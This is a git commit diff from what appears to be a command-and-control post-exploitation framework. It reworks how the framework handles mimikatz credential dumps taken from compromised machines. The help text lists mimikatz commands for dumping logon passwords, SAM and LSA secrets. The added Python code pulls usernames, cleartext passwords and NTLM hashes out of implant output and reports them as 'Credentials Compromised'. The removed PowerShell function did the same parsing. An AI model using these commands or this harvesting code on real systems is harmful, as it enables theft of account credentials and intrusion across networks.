Removed parse-mimikatz as now the "opsec" command parses this information from the command output

2019-03-08 10:32:55 +00:00 · 2019-03-08 10:32:55 +00:00 · 39f755f67b
parent 1af35a9603
commit 39f755f67b
3 changed files with 50 additions and 106 deletions
--- a/Help.py
+++ b/Help.py
@ -312,7 +312,6 @@ invoke-winrmsession -ipaddress <ip> -user <dom\\user> -pass <pass>
 posh_help7 = """
 Credentials / Tokens / Local Hashes (Must be SYSTEM):
 =========================================================
-invoke-mimikatz | out-string | parse-mimikatz
 invoke-mimikatz -command '"sekurlsa::logonpasswords"'
 invoke-mimikatz -command '"lsadump::sam"'
 invoke-mimikatz -command '"lsadump::lsa"'
--- a/ImplantHandler.py
+++ b/ImplantHandler.py
@ -19,6 +19,45 @@ from Opsec import *
 def catch_exit(signum, frame):
  sys.exit(0)

+def process_mimikatz(lines):
+    # code source https://github.com/stufus/parse-mimikatz-log/blob/master/pml.py
+    main_count = 0
+    num_lines = len(lines)
+    current = {}
+    all = []
+    for line in lines.split('\n'):
+        main_count += 1
+        percentage_count = "{0:.0f}%".format(float(main_count)/num_lines * 100)
+        
+        val = re.match('^\s*\*\s+Username\s+:\s+(.+)\s*$', line.strip())
+        if val != None:
+            x = process_mimikatzout(current)
+            if x not in all:
+                if x != None:
+                    all.append(x)
+            current = {}
+            current['Username'] = val.group(1).strip()
+            continue
+    
+        val = re.match('^\s*\*\s+(Domain|NTLM|SHA1|Password)\s+:\s+(.+)\s*$', line.strip())
+        if val != None:
+            if val.group(2).count(" ") < 10:
+                current[val.group(1).strip()] = val.group(2)
+
+    return all
+
+def process_mimikatzout(current):
+    fields = ['Domain','Username','NTLM','SHA1','Password']
+    for f in fields:
+        if f in current:
+            if current[f] == '(null)':
+                current[f] = ''
+        else:
+            current[f] = ''
+
+    if current['Username'] != '' and (current['Password'] != '' or current['NTLM'] != ''):
+        return current['Username'], current['Password'], current['NTLM']
+
 def createproxypayload():
  proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
  proxypass = raw_input("Proxy Password: e.g. Password1 ")
@ -329,6 +368,8 @@ def startup(user, printhelp = ""):
      uploads = ""
      urls = ""
      users = ""
+      creds = ""
+      hashes = ""
      for i in implants:
        if i[3] not in hosts:
          hosts += "%s \n" % i[3]
@ -338,6 +379,14 @@ def startup(user, printhelp = ""):
        hostname = get_implantdetails(t[1])
        if hostname[2] not in users:
          users += "%s\\%s @ %s\n" % (hostname[11], hostname[2],hostname[3])
+        if "invoke-mimikatz" in t[2] and "logonpasswords" in t[3]:
+          allcreds = process_mimikatz(t[3])
+          for cred in allcreds:
+            if cred != None:
+              if cred[1]:
+                creds += cred[0] + " Password: " + cred[1] + "\n"
+              if cred[2]:
+                hashes += cred[0] + " : NTLM:" + cred[2] + "\n"
        if "Uploaded file" in t[3]:
          uploadedfile = t[3]
          uploadedfile = uploadedfile.partition(":")[2]
@ -352,7 +401,7 @@ def startup(user, printhelp = ""):
          line = line.replace('\r','')
          filenameuploaded = line.rstrip().split(":",1)[1]
          uploads += "%s %s \n" % (hostname[3], filenameuploaded)
-      startup(user, "Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s" % (users, hosts, urls, uploads))
+      startup(user, "Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (users, hosts, urls, uploads, creds, hashes))
    if "listmodules" in implant_id.lower():
      mods = ""
      for modname in os.listdir("%s/Modules/" % POSHDIR):
--- a/Modules/Invoke-Mimikatz.ps1
+++ b/Modules/Invoke-Mimikatz.ps1
@ -2743,107 +2743,3 @@ $results = Main;
 "Hostname: $HostName / $DomainSID";
 $results
 }
-
-
-
-function Parse-Mimikatz {
-param(
-    [Parameter(
-        Position=0,
-        Mandatory=$true,
-        ValueFromPipeline=$true,
-        ValueFromPipelineByPropertyName=$true)
-    ]
-    [String[]]$raw
-    )
-
-    # msv
-	$results = $raw | Select-String -Pattern "(?s)(?<=msv :).*?(?=tspkg :)" -AllMatches | %{$_.matches} | %{$_.value}
-    if($results){
-        foreach($match in $results){
-            if($match.Contains("Domain")){
-                $lines = $match.split("`n")
-                foreach($line in $lines){
-                    if ($line.Contains("Username")){
-                        $username = $line.split(":")[1].trim()
-                    }
-                    elseif ($line.Contains("Domain")){
-                        $domain = $line.split(":")[1].trim()
-                    }
-                    elseif ($line.Contains("NTLM")){
-                        $password = $line.split(":")[1].trim()
-                    }
-                }
-                if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
-                    $domain+"\"+$username+":"+$password
-                }
-            }
-        }
-    }
-    $results = $raw | Select-String -Pattern "(?s)(?<=tspkg :).*?(?=wdigest :)" -AllMatches | %{$_.matches} | %{$_.value}
-    if($results){
-        foreach($match in $results){
-            if($match.Contains("Domain")){
-                $lines = $match.split("`n")
-                foreach($line in $lines){
-                    if ($line.Contains("Username")){
-                        $username = $line.split(":")[1].trim()
-                    }
-                    elseif ($line.Contains("Domain")){
-                        $domain = $line.split(":")[1].trim()
-                    }
-                    elseif ($line.Contains("Password")){
-                        $password = $line.split(":")[1].trim()
-                    }
-                }
-                if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
-                    $domain+"\"+$username+":"+$password
-                }
-            }
-        }
-    }
-    $results = $raw | Select-String -Pattern "(?s)(?<=wdigest :).*?(?=kerberos :)" -AllMatches | %{$_.matches} | %{$_.value}
-    if($results){
-        foreach($match in $results){
-            if($match.Contains("Domain")){
-                $lines = $match.split("`n")
-                foreach($line in $lines){
-                    if ($line.Contains("Username")){
-                        $username = $line.split(":")[1].trim()
-                    }
-                    elseif ($line.Contains("Domain")){
-                        $domain = $line.split(":")[1].trim()
-                    }
-                    elseif ($line.Contains("Password")){
-                        $password = $line.split(":")[1].trim()
-                    }
-                }
-                if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
-                    $domain+"\"+$username+":"+$password
-                }
-            }
-        }
-    }
-    $results = $raw | Select-String -Pattern "(?s)(?<=kerberos :).*?(?=ssp :)" -AllMatches | %{$_.matches} | %{$_.value}
-    if($results){
-        foreach($match in $results){
-            if($match.Contains("Domain")){
-                $lines = $match.split("`n")
-                foreach($line in $lines){
-                    if ($line.Contains("Username")){
-                        $username = $line.split(":")[1].trim()
-                    }
-                    elseif ($line.Contains("Domain")){
-                        $domain = $line.split(":")[1].trim()
-                    }
-                    elseif ($line.Contains("Password")){
-                        $password = $line.split(":")[1].trim()
-                    }
-                }
-                if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
-                    $domain+"\"+$username+":"+$password
-                }
-            }
-        }
-    }
-}